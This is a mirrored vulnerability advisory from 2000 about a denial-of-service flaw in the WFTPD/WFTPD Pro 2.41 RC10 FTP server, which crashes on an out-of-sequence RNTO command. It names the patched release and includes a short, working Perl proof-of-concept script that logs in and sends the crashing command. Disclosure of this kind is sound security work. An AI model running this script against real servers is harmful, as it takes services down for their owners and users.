Lucene search

K

wftpd241.txt

🗓️ 11 Jul 2000 00:00:00Reported by Blue PandaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

WFTPD Pro 2.41 RC10 crashes from out of sequence RNTO command by authenticated users.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`================================================================  
BluePanda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC10  
11/07/2000 (dd/mm/yyyy)  
  
[email protected]  
http://bluepanda.box.sk/  
================================================================  
  
Problem: An out of sequence RNTO command will cause WFTPD to crash.  
Vulnerable: WFTPD/WFTPD Pro 2.41 RC10, and prior.  
Immune: WFTPD/WFTPD Pro 2.41 RC11.  
  
==========  
Details:  
==========  
  
Anyone with a valid user/pass combination for a WFTPD server can cause it to  
terminate abnormally by issuing an RNTO command without first using RNFR.  
  
===================  
Proof of concept:  
===================  
  
#!/usr/bin/perl  
#  
# WFTPD/WFTPD Pro 2.41 RC10 denial-of-service  
# Blue Panda - [email protected]  
# http://bluepanda.box.sk/  
#  
# ----------------------------------------------------------  
# Disclaimer: this file is intended as proof of concept, and  
# is not intended to be used for illegal purposes. I accept  
# no responsibility for damage incurred by the use of it.  
# ----------------------------------------------------------  
#  
# Issues an RNTO command without first using RNFR, causing WFTPD to crash.  
#  
  
use IO::Socket;  
  
$host = "ftp.host.com" ;  
$port = "21";  
$user = "anonymous";  
$pass = "p\@nda";  
$wait = 10;  
  
# Connect to server.  
print "Connecting to $host:$port...";  
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";  
print "done.\n";  
  
# Login and issue premature RNTO command.  
print $socket "USER $user\nPASS $pass\nRNTO x\n";  
  
# Wait a while, just to make sure the commands have arrived.  
print "Waiting...";  
$time = 0;  
while ($time < $wait) {  
sleep(1);  
print ".";  
$time += 1;  
}  
  
# Finished.  
close($socket);  
print "\nConnection closed. Finished.\n"  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
11 Jul 2000 00:00Current
7.4High risk
Vulners AI Score7.4
27
.json
Report